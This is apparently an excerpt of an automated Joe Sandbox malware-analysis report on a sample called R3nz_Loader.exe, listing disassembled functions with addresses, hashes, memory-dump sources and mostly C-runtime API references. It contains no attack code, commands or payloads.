                                                                              • Associated: 00000000.00000002.2233550543.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_a10000_R3nz_Loader.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: f6ea0fe5301a7d69e7901375ef0d3b55105ee8a972305d5bafaec511f4e92d58
                                                                              • Instruction ID: 9e92495ecd09ed638712b6b8cda9d7eb40ca6c890f9828bc6897f086b49a6874
                                                                              • Opcode Fuzzy Hash: f6ea0fe5301a7d69e7901375ef0d3b55105ee8a972305d5bafaec511f4e92d58
                                                                              • Instruction Fuzzy Hash: E1526AB0509F818ED326CF3C8855797BFE5AB5A324F044A9DE0EA873D2C7756401CB6A
                                                                              Function 6CEF0250 Relevance: .6, Instructions: 566COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2236926030.000000006CEE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CEE0000, based on PE: true
                                                                              • Associated: 00000000.00000002.2236900845.000000006CEE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2236961655.000000006CEFB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2236989771.000000006CF01000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2237060285.000000006CF4D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_6cee0000_R3nz_Loader.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: becf1287dc10e0446a1bdf15615b794aeb487258e700154c346b0188ba753b8b
                                                                              • Instruction ID: eae11a2d98eec741e754a04cf67743dcb093214a413d4dee7174dd5c1e502c2c
                                                                              • Opcode Fuzzy Hash: becf1287dc10e0446a1bdf15615b794aeb487258e700154c346b0188ba753b8b
                                                                              • Instruction Fuzzy Hash: C212F272E452858FCB08CEBCD5907DD7BF2AB4B348F60D11AE435EBB64D62988078B15
                                                                              Function 00A37330 Relevance: .5, Instructions: 539COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2233480373.0000000000A12000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                              • Associated: 00000000.00000002.2233446565.0000000000A10000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2233550543.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_a10000_R3nz_Loader.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 548237460154a923dfb3441f3a477a9fff10452e96d15464c6b66e0a881dbfc9
                                                                              • Instruction ID: 940122f5fb261515a94e0403f7440a2f33c2332f281144253b599a22442e878f
                                                                              • Opcode Fuzzy Hash: 548237460154a923dfb3441f3a477a9fff10452e96d15464c6b66e0a881dbfc9
                                                                              • Instruction Fuzzy Hash: 8A12A1756483409FD718CF29C88176EFBE2AFC9304F18896DF4898B351DA76D806CB96
                                                                              Function 00A4ECD0 Relevance: .3, Instructions: 345COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2233480373.0000000000A12000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                              • Associated: 00000000.00000002.2233446565.0000000000A10000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2233550543.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_a10000_R3nz_Loader.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 6120583160aaad0bc7d6f92db997c681bdad3953fd9d0e50153b04b6b3487ba1
                                                                              • Instruction ID: 1ded64b0b21a980310362abb8b8742605fccff2aa23391c6a8c9a2a4d6efc744
                                                                              • Opcode Fuzzy Hash: 6120583160aaad0bc7d6f92db997c681bdad3953fd9d0e50153b04b6b3487ba1
                                                                              • Instruction Fuzzy Hash: 16B1E379904201EFD7109F24CD41B5BBBE2BBD8315F148A3DF898972A1E7329D19DB42
                                                                              Function 00A45E50 Relevance: .3, Instructions: 312COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2233480373.0000000000A12000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                              • Associated: 00000000.00000002.2233446565.0000000000A10000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2233550543.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_a10000_R3nz_Loader.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 3474c5d83ad8fc059f7da81fd417308675e25fa78d18bd02081c0340bc112389
                                                                              • Instruction ID: 476ace22192ec0a413097dfa75f6e60ac7729de0ca52c31aabf266a5417e5599
                                                                              • Opcode Fuzzy Hash: 3474c5d83ad8fc059f7da81fd417308675e25fa78d18bd02081c0340bc112389
                                                                              • Instruction Fuzzy Hash: E08104769047158BC724DF28C8A26A7B3B1FFD2364F19451CE8828B392F778D949C392
                                                                              Function 00A37CF0 Relevance: .3, Instructions: 303COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2233480373.0000000000A12000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                              • Associated: 00000000.00000002.2233446565.0000000000A10000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2233550543.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_a10000_R3nz_Loader.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: a4bb6cf192d1ce449bd16bd0bb60b52f0a7a7b3501a54718321d713002988865
                                                                              • Instruction ID: 4061d0c3fd03c97da2b1228602c6e28ae60157e660ce72069d48a580e595c42c
                                                                              • Opcode Fuzzy Hash: a4bb6cf192d1ce449bd16bd0bb60b52f0a7a7b3501a54718321d713002988865
                                                                              • Instruction Fuzzy Hash: 3EC14CB29487418FC370CF68DC96BABB7E1BF85318F08492DE1D9C6242D778A155CB45
                                                                              Function 00A68D50 Relevance: .3, Instructions: 295COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2233480373.0000000000A12000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                              • Associated: 00000000.00000002.2233446565.0000000000A10000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2233550543.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_a10000_R3nz_Loader.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 792ce430ea83698ad863c82b7adaa756b8c459c0fdea3e7f5e3db5fe9d8f74e8
                                                                              • Instruction ID: 6551caf19e91406ee7fabac661967a1a22021c2ecef6f72621bd8e721e3a4ce7
                                                                              • Opcode Fuzzy Hash: 792ce430ea83698ad863c82b7adaa756b8c459c0fdea3e7f5e3db5fe9d8f74e8
                                                                              • Instruction Fuzzy Hash: 93B1D632E046A18FC711CABCCC4059ABFB66B9B230B1DC3A5D5B59B3D6C6358807C761
                                                                              Function 00A4F4A0 Relevance: .2, Instructions: 184COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2233480373.0000000000A12000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                              • Associated: 00000000.00000002.2233446565.0000000000A10000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2233550543.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_a10000_R3nz_Loader.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: e0d4aa8ce4472efc5d283d5200842a462ea7a76cb43c3140dc8f6543153c5d65
                                                                              • Instruction ID: 6c7f1795b9932e47c0c1227762180c7751d3e32116e6d2b758cb9dbfe09e3af7
                                                                              • Opcode Fuzzy Hash: e0d4aa8ce4472efc5d283d5200842a462ea7a76cb43c3140dc8f6543153c5d65
                                                                              • Instruction Fuzzy Hash: 5D51493B649AC04FD3288E3C5C5026ABAA34BE7330F2E977DE5B18B3E1D9954C018345
                                                                              Function 00A71BB0 Relevance: .1, Instructions: 132COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2233480373.0000000000A12000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                              • Associated: 00000000.00000002.2233446565.0000000000A10000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2233550543.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_a10000_R3nz_Loader.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: c3e932547a5552e2626f43632a1c8873aa4f47c87113c5dc1e7adcebaa21ad20
                                                                              • Instruction ID: 77b2d44ebb1dbe39994fc42f57fc856df9f4fff1f583c2eeb174fc4dc28a417b
                                                                              • Opcode Fuzzy Hash: c3e932547a5552e2626f43632a1c8873aa4f47c87113c5dc1e7adcebaa21ad20
                                                                              • Instruction Fuzzy Hash: 8F413335648305AFE7249F58DC94B3BB3E6EB85700F28C53DE18C5B291E670AC119B89
                                                                              Function 00A71960 Relevance: .1, Instructions: 72COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2233480373.0000000000A12000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                              • Associated: 00000000.00000002.2233446565.0000000000A10000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2233550543.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_a10000_R3nz_Loader.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 6fe2a5c27107ec2fa4138074a64362a58113a56dd010fd0bbeab5b0cb3efeaca
                                                                              • Instruction ID: 4df8c79e5e511fcc6d3e810e34aa957cfb2bf1ec4c69a6cf68beeceb99b8f5d2
                                                                              • Opcode Fuzzy Hash: 6fe2a5c27107ec2fa4138074a64362a58113a56dd010fd0bbeab5b0cb3efeaca
                                                                              • Instruction Fuzzy Hash: C0216639A092415FCB248F08DC95ABFF7B2EB86390F28C53DE58957291EA30DD12C795
                                                                              Function 6CEF3C39 Relevance: .0, Instructions: 22COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2236926030.000000006CEE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CEE0000, based on PE: true
                                                                              • Associated: 00000000.00000002.2236900845.000000006CEE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2236961655.000000006CEFB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2236989771.000000006CF01000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2237060285.000000006CF4D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_6cee0000_R3nz_Loader.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 8d52fb2acaea47cc711755e886856fc2c512988177476dc3ebe6c672e5574d84
                                                                              • Instruction ID: 9f658c222567c9e4018bfba549599d1b55b9306e6b7d2831950807f545b10545
                                                                              • Opcode Fuzzy Hash: 8d52fb2acaea47cc711755e886856fc2c512988177476dc3ebe6c672e5574d84
                                                                              • Instruction Fuzzy Hash: F9E08C72912228EBCB11CBCCC94498AF3FCEB48B44B3144AAF526D3600C270DE01C7D0
                                                                              Function 00A65480 Relevance: 46.4, Strings: 37, Instructions: 142COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1851 a65480-a659a8
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2233480373.0000000000A12000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                              • Associated: 00000000.00000002.2233446565.0000000000A10000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2233550543.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_a10000_R3nz_Loader.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: nD$ nD$ nD$ nD$ nD$ nD$ nD$ nD$ nD$ nD$ nD$ nD$ nD$ nD$ nD$ nD$ nD$ nD$ nD$ nD$ nD$ nD$ nD$ nD$ nD$ nD$ nD$ nD$ nD$ nD$ nD$ nD$ nD$ nD$x~D$~D$~D
                                                                              • API String ID: 0-3050489951
                                                                              • Opcode ID: f2a818c7bc6a78271958487cbb387f714c5ba424ea171dc795ad971e9aac5e6f
                                                                              • Instruction ID: 76d8eb73e0924199876ac90193d70d00fd1cd975b316779f0fa48cd1ee661aa0
                                                                              • Opcode Fuzzy Hash: f2a818c7bc6a78271958487cbb387f714c5ba424ea171dc795ad971e9aac5e6f
                                                                              • Instruction Fuzzy Hash: 38B10FB48152699BEB618F01DD487CDBAF5AB06308F91D5CAD40C3A244CBB90F8D8F95
                                                                              Function 00A62550 Relevance: 43.9, Strings: 35, Instructions: 119COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1852 a62550-a628ce
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2233480373.0000000000A12000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                              • Associated: 00000000.00000002.2233446565.0000000000A10000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2233550543.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_a10000_R3nz_Loader.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: nD$ nD$ nD$ nD$ nD$ nD$ nD$ nD$ nD$ nD$ nD$ nD$ nD$ nD$ nD$ nD$ nD$ nD$ nD$ nD$ nD$ nD$ nD$$|D$0|D$<|D$@{D$\{D$`|D$h{D$t{D$||D$%D${D${D
                                                                              • API String ID: 0-2526032011
                                                                              • Opcode ID: 82ee4f9b0517dad5767835e3f09cdddb2b5a99043de67a5bb93205eb92845432
                                                                              • Instruction ID: 58c4bab62074ca7419a513c22af9ce689d04b6983e29373c28daeed3694b7b35
                                                                              • Opcode Fuzzy Hash: 82ee4f9b0517dad5767835e3f09cdddb2b5a99043de67a5bb93205eb92845432
                                                                              • Instruction Fuzzy Hash: 628165B850D3818FE374CF14E59869BBBE2FB8A318F11991ED48847354CB785449CF8A
                                                                              Function 6CEF6628 Relevance: 19.6, APIs: 13, Instructions: 113COMMONLIBRARYCODE
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1854 6cef6628-6cef663c 1855 6cef663e-6cef6643 1854->1855 1856 6cef66aa-6cef66b2 1854->1856 1855->1856 1859 6cef6645-6cef664a 1855->1859 1857 6cef66f9-6cef6711 call 6cef6799 1856->1857 1858 6cef66b4-6cef66b7 1856->1858 1866 6cef6714-6cef671b 1857->1866 1858->1857 1862 6cef66b9-6cef66f6 call 6cef3f43 * 4 1858->1862 1859->1856 1861 6cef664c-6cef664f 1859->1861 1861->1856 1864 6cef6651-6cef6659 1861->1864 1862->1857 1867 6cef665b-6cef665e 1864->1867 1868 6cef6673-6cef667b 1864->1868 1870 6cef671d-6cef6721 1866->1870 1871 6cef673a-6cef673e 1866->1871 1867->1868 1872 6cef6660-6cef6672 call 6cef3f43 call 6cef8557 1867->1872 1873 6cef667d-6cef6680 1868->1873 1874 6cef6695-6cef66a9 call 6cef3f43 * 2 1868->1874 1877 6cef6737 1870->1877 1878 6cef6723-6cef6726 1870->1878 1882 6cef6756-6cef6762 1871->1882 1883 6cef6740-6cef6745 1871->1883 1872->1868 1873->1874 1880 6cef6682-6cef6694 call 6cef3f43 call 6cef8655 1873->1880 1874->1856 1877->1871 1878->1877 1886 6cef6728-6cef6736 call 6cef3f43 * 2 1878->1886 1880->1874 1882->1866 1885 6cef6764-6cef676f call 6cef3f43 1882->1885 1890 6cef6747-6cef674a 1883->1890 1891 6cef6753 1883->1891 1886->1877 1890->1891 1898 6cef674c-6cef6752 call 6cef3f43 1890->1898 1891->1882 1898->1891
                                                                              APIs
                                                                              • ___free_lconv_mon.LIBCMT ref: 6CEF666C
                                                                                • Part of subcall function 6CEF8557: _free.LIBCMT ref: 6CEF8574
                                                                                • Part of subcall function 6CEF8557: _free.LIBCMT ref: 6CEF8586
                                                                                • Part of subcall function 6CEF8557: _free.LIBCMT ref: 6CEF8598
                                                                                • Part of subcall function 6CEF8557: _free.LIBCMT ref: 6CEF85AA
                                                                                • Part of subcall function 6CEF8557: _free.LIBCMT ref: 6CEF85BC
                                                                                • Part of subcall function 6CEF8557: _free.LIBCMT ref: 6CEF85CE
                                                                                • Part of subcall function 6CEF8557: _free.LIBCMT ref: 6CEF85E0
                                                                                • Part of subcall function 6CEF8557: _free.LIBCMT ref: 6CEF85F2
                                                                                • Part of subcall function 6CEF8557: _free.LIBCMT ref: 6CEF8604
                                                                                • Part of subcall function 6CEF8557: _free.LIBCMT ref: 6CEF8616
                                                                                • Part of subcall function 6CEF8557: _free.LIBCMT ref: 6CEF8628
                                                                                • Part of subcall function 6CEF8557: _free.LIBCMT ref: 6CEF863A
                                                                                • Part of subcall function 6CEF8557: _free.LIBCMT ref: 6CEF864C
                                                                              • _free.LIBCMT ref: 6CEF6661
                                                                                • Part of subcall function 6CEF3F43: HeapFree.KERNEL32(00000000,00000000,?,6CEF317C), ref: 6CEF3F59
                                                                                • Part of subcall function 6CEF3F43: GetLastError.KERNEL32(?,?,6CEF317C), ref: 6CEF3F6B
                                                                              • _free.LIBCMT ref: 6CEF6683
                                                                              • _free.LIBCMT ref: 6CEF6698
                                                                              • _free.LIBCMT ref: 6CEF66A3
                                                                              • _free.LIBCMT ref: 6CEF66C5
                                                                              • _free.LIBCMT ref: 6CEF66D8
                                                                              • _free.LIBCMT ref: 6CEF66E6
                                                                              • _free.LIBCMT ref: 6CEF66F1
                                                                              • _free.LIBCMT ref: 6CEF6729
                                                                              • _free.LIBCMT ref: 6CEF6730
                                                                              • _free.LIBCMT ref: 6CEF674D
                                                                              • _free.LIBCMT ref: 6CEF6765
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2236926030.000000006CEE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CEE0000, based on PE: true
                                                                              • Associated: 00000000.00000002.2236900845.000000006CEE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2236961655.000000006CEFB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2236989771.000000006CF01000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2237060285.000000006CF4D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_6cee0000_R3nz_Loader.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                              • String ID:
                                                                              • API String ID: 161543041-0
                                                                              • Opcode ID: 8ab26e4cb2653a4b405e3afa5ffb32514c22df04488f6e9803c0d9799e4e01bf
                                                                              • Instruction ID: b67b820549b0ca84634019fba285c316a87be50a09c86a1d7164c1798ba83a1e
                                                                              • Opcode Fuzzy Hash: 8ab26e4cb2653a4b405e3afa5ffb32514c22df04488f6e9803c0d9799e4e01bf
                                                                              • Instruction Fuzzy Hash: 37313D32604701DFEB218B35D845B8A73F8AF4071CF31856EE079DBA90EB70EA568B11
                                                                              Function 6CEF3803 Relevance: 15.1, APIs: 10, Instructions: 69COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1911 6cef3803-6cef3816 1912 6cef3818-6cef3821 call 6cef3f43 1911->1912 1913 6cef3822-6cef38cf call 6cef3f43 * 9 call 6cef362f call 6cef369a 1911->1913 1912->1913
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2236926030.000000006CEE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CEE0000, based on PE: true
                                                                              • Associated: 00000000.00000002.2236900845.000000006CEE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2236961655.000000006CEFB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2236989771.000000006CF01000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2237060285.000000006CF4D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_6cee0000_R3nz_Loader.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                              • String ID:
                                                                              • API String ID: 776569668-0
                                                                              • Opcode ID: 200d1b1fe1ec41983c7f1e06a800336cef1d8638692b92be113c1b3a35f0338a
                                                                              • Instruction ID: 0c0175ea5d94203c554ace22dd8fffecc8a1bc09e1a62669ca61065760a9f55e
                                                                              • Opcode Fuzzy Hash: 200d1b1fe1ec41983c7f1e06a800336cef1d8638692b92be113c1b3a35f0338a
                                                                              • Instruction Fuzzy Hash: B321E977900108AFDB51DF94C881DDE7BB8FF08644F1181AAF5269B620EB71EB59CB81
                                                                              Function 6CEF546A Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 77COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2236926030.000000006CEE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CEE0000, based on PE: true
                                                                              • Associated: 00000000.00000002.2236900845.000000006CEE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2236961655.000000006CEFB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2236989771.000000006CF01000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2237060285.000000006CF4D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_6cee0000_R3nz_Loader.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: api-ms-$ext-ms-$|1l
                                                                              • API String ID: 0-2938335441
                                                                              • Opcode ID: 6f24c00911377c798f866c2b8561cea1f2bbd97ed73c06efa284bb61809dc0c8
                                                                              • Instruction ID: 8df6544d57f0e4f82b8a03f65c08ac33859f54542a21b736ed8a4a550fcca3c9
                                                                              • Opcode Fuzzy Hash: 6f24c00911377c798f866c2b8561cea1f2bbd97ed73c06efa284bb61809dc0c8
                                                                              • Instruction Fuzzy Hash: F521EE31E07611EBDB124AA99C40B1A37799F5376DF318614EC71ABB81E730D90385E0
                                                                              Function 6CEF1DE0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _ValidateLocalCookies.LIBCMT ref: 6CEF1E17
                                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 6CEF1E1F
                                                                              • _ValidateLocalCookies.LIBCMT ref: 6CEF1EA8
                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 6CEF1ED3
                                                                              • _ValidateLocalCookies.LIBCMT ref: 6CEF1F28
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2236926030.000000006CEE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CEE0000, based on PE: true
                                                                              • Associated: 00000000.00000002.2236900845.000000006CEE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2236961655.000000006CEFB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2236989771.000000006CF01000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2237060285.000000006CF4D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_6cee0000_R3nz_Loader.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                              • String ID: csm
                                                                              • API String ID: 1170836740-1018135373
                                                                              • Opcode ID: 9bb66b2764171c3d0637330c9ce5bebef3471ad56491126ee13420b2d2729208
                                                                              • Instruction ID: ff2fca37a9c755a0ab080317a0527a1c9d232e40597005ea18266b6336ee0c9e
                                                                              • Opcode Fuzzy Hash: 9bb66b2764171c3d0637330c9ce5bebef3471ad56491126ee13420b2d2729208
                                                                              • Instruction Fuzzy Hash: 74417674E001499BDF00CFA8C844ADEBBB5AF4536CF248559D8349BB52D732DA17CB91
                                                                              Function 6CEF47AF Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 83COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2236926030.000000006CEE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CEE0000, based on PE: true
                                                                              • Associated: 00000000.00000002.2236900845.000000006CEE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2236961655.000000006CEFB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2236989771.000000006CF01000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2237060285.000000006CF4D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_6cee0000_R3nz_Loader.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: =Il$C:\Users\user\Desktop\R3nz_Loader.exe
                                                                              • API String ID: 0-4120228309
                                                                              • Opcode ID: cadfebe7544a8396b21b7e076a11b1a0597fe95cb43669fc41bd800dab97e9ce
                                                                              • Instruction ID: d69a027354536b397746295784da1080772820ff071f001c78ff751928cf4777
                                                                              • Opcode Fuzzy Hash: cadfebe7544a8396b21b7e076a11b1a0597fe95cb43669fc41bd800dab97e9ce
                                                                              • Instruction Fuzzy Hash: 1A219271604299AF9B109F758D90D9B77BDAF0236C724862AF63497B40E734DE028BA1
                                                                              Function 6CEF86F6 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 6CEF86BE: _free.LIBCMT ref: 6CEF86E3
                                                                              • _free.LIBCMT ref: 6CEF8744
                                                                                • Part of subcall function 6CEF3F43: HeapFree.KERNEL32(00000000,00000000,?,6CEF317C), ref: 6CEF3F59
                                                                                • Part of subcall function 6CEF3F43: GetLastError.KERNEL32(?,?,6CEF317C), ref: 6CEF3F6B
                                                                              • _free.LIBCMT ref: 6CEF874F
                                                                              • _free.LIBCMT ref: 6CEF875A
                                                                              • _free.LIBCMT ref: 6CEF87AE
                                                                              • _free.LIBCMT ref: 6CEF87B9
                                                                              • _free.LIBCMT ref: 6CEF87C4
                                                                              • _free.LIBCMT ref: 6CEF87CF
                                                                              Memory Dump Source
